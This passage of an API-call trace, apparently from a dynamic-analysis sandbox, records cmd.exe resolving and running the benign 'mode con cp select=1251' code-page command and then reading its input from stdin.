(LangId=0x0) returned 0x7fffffd0409 [0267.288] GetConsoleTitleW (in: lpConsoleTitle=0x1cf480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.288] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0267.288] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0267.288] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0267.288] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0267.288] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0267.288] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0267.288] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0267.289] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0267.289] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0267.289] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0267.289] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0267.289] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0267.289] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0267.289] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0267.289] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0267.289] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0267.289] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0267.289] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0267.289] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0267.289] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0267.289] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0267.289] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0267.289] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0267.289] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0267.289] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0267.289] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0267.289] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0267.289] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0267.289] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0267.289] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0267.289] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0267.289] _wcsicmp (_String1="mode", _String2="START") returned -6 [0267.289] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0267.289] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0267.289] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0267.289] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0267.289] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0267.289] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0267.289] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0267.289] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0267.289] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0267.289] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0267.289] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0267.289] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0267.289] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0267.289] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0267.290] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0267.290] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0267.290] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0267.290] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0267.290] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0267.290] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0267.290] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0267.290] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0267.290] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0267.290] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0267.290] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0267.290] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0267.290] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0267.290] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0267.290] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0267.290] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0267.290] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0267.290] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0267.290] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0267.290] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0267.290] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0267.290] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0267.290] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0267.290] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0267.290] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0267.290] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0267.290] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0267.290] _wcsicmp (_String1="mode", _String2="START") returned -6 [0267.290] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0267.290] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0267.290] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0267.290] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0267.290] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0267.290] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0267.291] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0267.291] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0267.291] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0267.291] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0267.291] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0267.291] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0267.291] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0267.291] GetProcessHeap () returned 0x220000 [0267.291] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x23aae0 [0267.291] GetProcessHeap () returned 0x220000 [0267.291] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x42) returned 0x239900 [0267.291] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0267.291] GetProcessHeap () returned 0x220000 [0267.291] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x420) returned 0x23b310 [0267.291] SetErrorMode (uMode=0x0) returned 0x0 [0267.291] SetErrorMode (uMode=0x1) returned 0x0 [0267.291] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x23b320, lpFilePart=0x1ced10 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ced10*="system32") returned 0x13 [0267.291] SetErrorMode (uMode=0x0) returned 0x1 [0267.291] GetProcessHeap () returned 0x220000 [0267.291] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b310, Size=0x42) returned 0x23b310 [0267.291] GetProcessHeap () returned 0x220000 [0267.291] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b310) returned 0x42 [0267.291] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0267.291] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0267.292] GetProcessHeap () returned 0x220000 [0267.292] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x104) returned 0x235bb0 [0267.292] GetProcessHeap () returned 0x220000 [0267.292] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1f8) returned 0x239c60 [0267.297] GetProcessHeap () returned 0x220000 [0267.297] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239c60, Size=0x106) returned 0x239c60 [0267.297] GetProcessHeap () returned 0x220000 [0267.297] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239c60) returned 0x106 [0267.297] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0267.297] GetProcessHeap () returned 0x220000 [0267.297] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe8) returned 0x239d80 [0267.297] GetProcessHeap () returned 0x220000 [0267.297] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239d80, Size=0x7e) returned 0x239d80 [0267.297] GetProcessHeap () returned 0x220000 [0267.297] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239d80) returned 0x7e [0267.298] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0267.299] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x1cea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea80) returned 0x235cc0 [0267.299] GetProcessHeap () returned 0x220000 [0267.299] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x28) returned 0x234660 [0267.299] FindClose (in: hFindFile=0x235cc0 | out: hFindFile=0x235cc0) returned 1 [0267.299] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x1cea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea80) returned 0x235cc0 [0267.299] GetProcessHeap () returned 0x220000 [0267.299] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x234660, Size=0x8) returned 0x239950 [0267.299] FindClose (in: hFindFile=0x235cc0 | out: hFindFile=0x235cc0) returned 1 [0267.299] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0267.299] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0267.299] GetConsoleTitleW (in: lpConsoleTitle=0x1cefd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.299] GetProcessHeap () returned 0x220000 [0267.299] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x21c) returned 0x23b370 [0267.299] GetConsoleTitleW (in: lpConsoleTitle=0x23b380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.299] GetProcessHeap () returned 0x220000 [0267.299] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b370, Size=0x8a) returned 0x23b370 [0267.299] GetProcessHeap () returned 0x220000 [0267.299] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b370) returned 0x8a [0267.299] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0267.300] GetProcessHeap () returned 0x220000 [0267.300] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b370 | out: hHeap=0x220000) returned 1 [0267.300] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ced88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ced48 | out: lpAttributeList=0x1ced88, lpSize=0x1ced48) returned 1 [0267.300] UpdateProcThreadAttribute (in: lpAttributeList=0x1ced88, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ced38, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ced88, lpPreviousValue=0x0) returned 1 [0267.300] GetStartupInfoW (in: lpStartupInfo=0x1ceea0 | out: lpStartupInfo=0x1ceea0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0267.300] GetProcessHeap () returned 0x220000 [0267.300] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x20) returned 0x234660 [0267.300] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0267.300] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0267.300] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0267.300] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0267.301] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0267.302] GetProcessHeap () returned 0x220000 [0267.302] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234660 | out: hHeap=0x220000) returned 1 [0267.302] GetProcessHeap () returned 0x220000 [0267.302] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x12) returned 0x238940 [0267.302] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cedc0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ced70 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x1ced70*(hProcess=0x54, hThread=0x50, dwProcessId=0x60c, dwThreadId=0x610)) returned 1 [0267.307] CloseHandle (hObject=0x50) returned 1 [0267.307] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0267.307] GetProcessHeap () returned 0x220000 [0267.307] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x238aa0 | out: hHeap=0x220000) returned 1 [0267.307] GetEnvironmentStringsW () returned 0x238aa0* [0267.308] GetProcessHeap () returned 0x220000 [0267.308] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xafc) returned 0x23b370 [0267.308] FreeEnvironmentStringsW (penv=0x238aa0) returned 1 [0267.308] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77bf0000 [0267.308] GetProcAddress (hModule=0x77bf0000, lpProcName="NtQueryInformationProcess") returned 0x77c414a0 [0267.308] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x1ce678, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1ce678, ReturnLength=0x0) returned 0x0 [0267.308] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x1ce6b0, nSize=0x380, lpNumberOfBytesRead=0x1ce670 | out: lpBuffer=0x1ce6b0*, lpNumberOfBytesRead=0x1ce670*=0x380) returned 1 [0267.308] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0267.910] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1cecb8 | out: lpExitCode=0x1cecb8*=0x0) returned 1 [0267.910] CloseHandle (hObject=0x54) returned 1 [0267.910] _vsnwprintf (in: _Buffer=0x1cef28, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cecc8 | out: _Buffer="00000000") returned 8 [0267.910] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0267.910] GetProcessHeap () returned 0x220000 [0267.910] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b370 | out: hHeap=0x220000) returned 1 [0267.910] GetEnvironmentStringsW () returned 0x23e9b0* [0267.910] GetProcessHeap () returned 0x220000 [0267.910] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb22) returned 0x23f4e0 [0267.910] FreeEnvironmentStringsW (penv=0x23e9b0) returned 1 [0267.910] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0267.910] GetProcessHeap () returned 0x220000 [0267.910] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23f4e0 | out: hHeap=0x220000) returned 1 [0267.910] GetEnvironmentStringsW () returned 0x23e9b0* [0267.910] GetProcessHeap () returned 0x220000 [0267.910] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb22) returned 0x23f4e0 [0267.910] FreeEnvironmentStringsW (penv=0x23e9b0) returned 1 [0267.910] GetProcessHeap () returned 0x220000 [0267.910] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x238940 | out: hHeap=0x220000) returned 1 [0267.910] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ced88 | out: lpAttributeList=0x1ced88) [0267.910] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0267.911] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.911] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0267.911] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.911] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a86e194 | out: lpMode=0x4a86e194) returned 0 [0267.911] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.911] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a86e198 | out: lpMode=0x4a86e198) returned 0 [0267.911] GetConsoleOutputCP () returned 0x4e3 [0267.911] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0267.912] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239d80 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239c60 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x235bb0 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b310 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239900 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23aae0 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x236550 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234630 | out: hHeap=0x220000) returned 1 [0267.912] GetProcessHeap () returned 0x220000 [0267.912] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239840 | out: hHeap=0x220000) returned 1 [0267.912] _vsnwprintf (in: _Buffer=0x4a886340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf1e8 | out: _Buffer="\r\n") returned 2 [0267.912] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.912] GetFileType (hFile=0xf4) returned 0x3 [0267.912] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.912] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0267.912] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf1b8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf1b8*=0x2, lpOverlapped=0x0) returned 1 [0267.912] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0267.912] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a87c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0267.913] _vsnwprintf (in: _Buffer=0x4a86eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf1f8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0267.913] _vsnwprintf (in: _Buffer=0x4a86eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1cf1f8 | out: _Buffer=">") returned 1 [0267.913] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.913] GetFileType (hFile=0xf4) returned 0x3 [0267.913] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.913] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0267.913] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1cf1e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf1e8*=0x14, lpOverlapped=0x0) returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] GetFileType (hFile=0xe8) returned 0x3 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.913] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.913] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.913] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.913] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.913] ReadFile (in: hFile=0xe8, 